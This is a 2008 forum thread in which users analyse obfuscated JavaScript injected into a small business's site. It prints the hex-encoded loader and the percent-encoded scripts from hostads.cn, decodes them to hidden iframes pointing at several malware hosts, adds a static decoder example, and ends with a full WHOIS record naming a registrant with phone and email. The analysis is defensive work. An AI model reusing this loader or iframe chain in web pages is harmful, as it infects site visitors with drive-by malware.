Author Topic: Is this malware ?  (Read 6636 times)


December 20, 2008, 10:55:07 pm

DanS

Hi,

This page
Code:
http://www.bighawk.ca/
includes a js:
Code:
<script type="text/javascript" src="sohoadmin/client_files/embed.js"></script>
that looks suspicious to me because of the last line:
Code:
D35F228602D39="p";D35F228602D39+="ars";D35F228602D39+="eInt";B63B75EEF23B="Strin";B63B75EEF23B+="g";B63B75EEF23B+=".fromC";B63B75EEF23B+="harC";B63B75EEF23B+="ode";function EA539FE(FFAE0E5C7382D2){var BB1591F196AE968=578;BB1591F196AE968=BB1591F196AE968-562;D6AA8=eval(D35F228602D39+"(FFAE0E5C7382D2,BB1591F196AE968)");return(D6AA8);}function F8BF3CF8447C14(A313CD692470){var CF9FD04E6E=415;CF9FD04E6E=CF9FD04E6E-413;var FF01993317FC17="";for(F7733F0F2D=0;F7733F0F2D<A313CD692470.length;F7733F0F2D+=CF9FD04E6E){FF01993317FC17+=( eval(B63B75EEF23B+"(EA539FE(A313CD692470.substr(F7733F0F2D,CF9FD04E6E)))"));}eval(FF01993317FC17);}F8BF3CF8447C14("69662028646F63756D656E742E636F6F6B69652E73656172636828226C7062623D312229203D3D202D3129207B0A707174693D646F63756D656E742E676574456C656D656E744279496428276875707127293B696628707174693D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D68757071207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20226C7062623D313B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
The line, when executed, generates the following fragment that includes an iframe:
Code:
if (document.cookie.search("lpbb=1") == -1) {
pqti=document.getElementById('hupq');if(pqti==null){document.write('<iframe id=hupq src=http://hostads.cn style=display:none></iframe>');}
document.cookie = "lpbb=1;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

Today the hostads.cn is returning a bogus 404 'not found' page but a few days ago I believe it redirected to a known malware site.
My question is:

Assuming this doesn't do any damage right now, is that last line of the embed.js suspicious enough to declare it malware?

Thanks for any thoughts,
DanS

December 22, 2008, 01:42:43 am
Reply #1

MysteryFCM

I'd say yes ;) (Avira went nuts over this one)

Code:
*****************************************************************
vURL Desktop Edition v0.3.6 Results
Source code for: http://hostads.cn
Server IP: 92.241.176.101 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 3
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 22 December 2008
Time: 01:37:35:37
*****************************************************************
<SCRIPT Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%31%35%2E%31%32%36%2E%32%2E%31%34%30%2F%75%70%64%61%74%65%2E%68%74%6D%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));
</SCRIPT>
<SCRIPT Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%61%72%75%73%35%36%2E%63%6E%2F%76%6F%76%33%2F%76%6F%76%2F%69%6E%64%65%78%2E%70%68%70%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));
</SCRIPT>
<SCRIPT Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%69%76%69%6E%65%74%73%2E%63%6E%2F%7A%2F%76%73%2E%68%74%6D%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%65%70%72%2E%69%6E%66%6F%2F%65%76%6F%2F%63%6F%75%6E%74%2E%70%68%70%3F%6F%3D%32%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%69%76%69%6E%65%74%73%2E%63%6E%2F%7A%2F%7A%2E%68%74%6D%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%69%6B%6C%6F%70%2E%63%6E%2F%74%6F%6F%6C%2F%74%6F%6F%6C%32%2F%69%6E%2E%63%67%69%3F%62%61%67%67%69%31%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%69%76%69%6E%65%74%73%2E%63%6E%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));
</SCRIPT>

The first escapes to;

Code:
<iframe src="http://115.126.2.140/update.htm" width=1 height=1></iframe>
The second to;

Code:
<iframe src="http://farus56.cn/vov3/vov/index.php" width=1 height=1></iframe>
.... and the third is the most fun - it escapes to;

Code:
<iframe src="http://divinets.cn/z/vs.htm" width=1 height=1></iframe>
<iframe src="http://lepr.info/evo/count.php?o=2" width=1 height=1></iframe>
<iframe src="http://divinets.cn/z/z.htm" width=1 height=1></iframe>
<iframe src="http://ciklop.cn/tool/tool2/in.cgi?baggi1" width=1 height=1></iframe>
<iframe src="http://divinets.cn/out.php?s_id=1" width=1 height=1></iframe>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
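
Added example, not part of either post above: a static JavaScript decoder for the two encodings shown in this thread (the hex-pair layer in embed.js and the %XX layer served by hostads.cn) that treats the payload purely as a string and never calls eval() or document.write(). The function names and the example.test samples are constructed for illustration.

```javascript
// Added example: decode both layers as plain strings; nothing is eval()'d.

// Layer 1 (embed.js): each pair of hex digits is one character code.
function decodeHexPairs(hex) {
  if (!/^(?:[0-9a-fA-F]{2})*$/.test(hex)) {
    throw new Error("not an even-length hex string");
  }
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Layer 2 (hostads.cn page): %XX escapes as consumed by unescape().
// Malformed escapes are left untouched; %uXXXX forms are not handled.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) =>
    String.fromCharCode(parseInt(h, 16)));
}

// List iframe targets in decoded markup and flag hidden or 0/1-pixel frames.
function findIframes(markup) {
  const found = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(markup)) !== null) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    const tiny = /\bwidth\s*=\s*["']?[01]\b/i.test(attrs) &&
      /\bheight\s*=\s*["']?[01]\b/i.test(attrs);
    const hidden = tiny || /display\s*:\s*none/i.test(attrs);
    found.push({ src: src ? src[1] : null, hidden });
  }
  return found;
}

// Constructed samples; example.test is a placeholder, not a host from the thread.
const hexOf = (c) => c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0");
const toHex = (s) => [...s].map(hexOf).join("");
const toPct = (s) => [...s].map((c) => (c === " " ? c : "%" + hexOf(c))).join("");
const layer1 = toHex("document.write('<iframe id=x src=http://example.test " +
  "style=display:none></iframe>');");
const layer2 = toPct('<iframe src="http://example.test/a.htm" width=1 height=1></iframe>');

console.log(findIframes(decodeHexPairs(layer1)));
console.log(findIframes(decodePercent(layer2)));
```

Run it under Node.js rather than in a browser, so that the decoded markup is only ever printed and never rendered.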

January 04, 2009, 08:32:21 pm
Reply #2

Monkey

DO NOT VISIT LEPR.INFO - it will crash your browser in some cases.

Yes, this is malware. The ba***** who hacked my website put in a javascript function that called his page, however mine was encrypted, and the link, after executing the javascript function, was with a 5 on the end, not a 2 in your case.

I WHOIS'd the site, here's what I got:

Domain ID:D27158300-LRMS
Domain Name:LEPR.INFO
Created On:12-Dec-2008 10:11:35 UTC
Expiration Date:12-Dec-2009 10:11:35 UTC
Sponsoring Registrar:Regtime Ltd. (R455-LRMS)
Status:TRANSFER PROHIBITED
Registrant ID:CO403353-RT
Registrant Name:Sumir Mahadjan
Registrant Organization:Private person
Registrant Street1:3 Shenton way, 24-03, Senton House
Registrant Street2:
Registrant Street3:
Registrant City:Sharma
Registrant State/Province:Luis
Registrant Postal Code:688085
Registrant Country:SG
Registrant Phone:+65.3239258
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:mahadjans9@gmail.com
Admin ID:CA403353-RT
Admin Name:Sumir Mahadjan
Admin Organization:Private person
Admin Street1:3 Shenton way, 24-03, Senton House
Admin Street2:
Admin Street3:
Admin City:Sharma
Admin State/Province:Luis
Admin Postal Code:688085
Admin Country:SG
Admin Phone:+65.3239258
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:mahadjans9@gmail.com
Billing ID:CB403353-RT
Billing Name:Sumir Mahadjan
Billing Organization:Private person
Billing Street1:3 Shenton way, 24-03, Senton House
Billing Street2:
Billing Street3:
Billing City:Sharma
Billing State/Province:Luis
Billing Postal Code:688085
Billing Country:SG
Billing Phone:+65.3239258
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:mahadjans9@gmail.com
Tech ID:CT403353-RT
Tech Name:Sumir Mahadjan
Tech Organization:Private person
Tech Street1:3 Shenton way, 24-03, Senton House
Tech Street2:
Tech Street3:
Tech City:Sharma
Tech State/Province:Luis
Tech Postal Code:688085
Tech Country:SG
Tech Phone:+65.3239258
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:mahadjans9@gmail.com
Name Server:NS2.MTVP.INFO
Name Server:NS1.MTVP.INFO

Any way to get this site shut down?